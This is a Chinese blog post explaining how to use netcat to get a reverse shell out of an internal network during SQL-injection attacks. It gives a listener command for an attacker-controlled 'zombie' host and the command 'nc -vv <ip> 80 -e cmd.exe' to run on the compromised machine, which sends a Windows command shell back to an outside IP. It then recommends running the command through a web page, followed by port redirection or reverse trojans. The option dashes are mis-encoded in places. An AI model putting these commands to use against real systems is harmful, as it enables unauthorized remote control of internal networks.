nc命令小材大用

nc 命令小材大用
simeon
通过本文你可以学到:
1 SQL 注入内网渗透的一种思路
2 nc 命令的一种好用法
   内网渗透对于网络安全爱好者,特别是网络入侵检测时无疑是一种疼,很多时候我们遇到这种情况只有采取放弃,其实不然,完全使用另外一种方法来进行突破。很多人多知道 nc 号称瑞士军刀,是一款非常不错的网络安全工具,其强大的功能毫不逊于一款远程控制软件,只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对 nc 的具体用法。
(一)在控制端监听端口
这个控制端可以是自己的肉鸡,可以是在具有独立 IP 的网络计算机上,一定要具有独立 IP ,否则无法反弹到该 IP 地址。使用命令如下:
Nc �Cvv �Cl �Cp port 例如 nc �Cvv �Cl �Cp 80
在控制端监听端口时,需要注意的是,需要先使用“ netstat -an ”查看网络端口的开放情况(图 1 ),选择一个未监听的端口,一般选择 80 443 446 110 25 23 端口为好,当然其他未用端口也可以。
1 使用 netstat �Can 查看端口开情况
说明:如果控制端已经开放了我们要监听的端口,那么我们使用 nc 监听该端口不会成功, nc 程序会提示错误信息,如果监听正常,会显示“ Listening on  [any] 80 ……. ”字样(图 2 )。
2 在控制端监听 80 端口
(二)在内网计算机开放端口
      在内网计算机上运行“ nc �Cvv ipaddress port �Ce cmd.exe ”,这里的 IPaddress 一定是控制端的 ip 地址,例如控制端的地址为“ 202.108. 33.32 ,且80 端口未开放,则在内网计算机上运行“ nc �Cvv -202.108. 33.32 80 �Ce cmd.exe ”即可。如果一切正常,则会反弹一个 dosshell 回来,跟 cmd 命令的运行界面差不多,就象在本机的 DOS 下操作一样,非常好用,可以粘贴命令,直接执行命令等(图 3 )。使用“ net user ”命令,可以看到我的账号“ simeon ”在其中。
3 反弹 shell 成功
(三)其它运用
本文介绍的是如何使用 nc 来反弹内网的 shell ,在 sql 注入的过程中,很多时候遇到独立主机是内网 IP ,及时主机开放了 3389 也无法连接进去,这个时候,一个真正的 dosshell 就特别重要,通过网页执行 nc 命令,提供该内网一个 shell ,然后执行 lcx 端口重定向或者执行反弹木马或者其他命令,无疑是一个很好的解决方法。
(四)结束语
    本文就技术难度来说,并不是很大, nc 这个软件很多朋友都熟悉,可以这么说,搞网络安全的没有不熟悉 nc 这个软件的,但是对于 nc 命令的很多用法,不一定熟悉。想不起来曾经看过的一部电影,其中有这么一段话,高手就是将一个复杂的动作做到单一和简单!这跟真正的武林高手一样,不一定需要太多招式,一刀一剑就可以致命取胜。网络安全也是如此,对一个工具要熟能生巧,举一反三,才能出现更多的用法,更多的新的 idea ,期待大家新的发现。

本文出自 “simeon技术专栏” 博客,谢绝转载!

你可能感兴趣的:(职场,休闲,nc命令小材大用)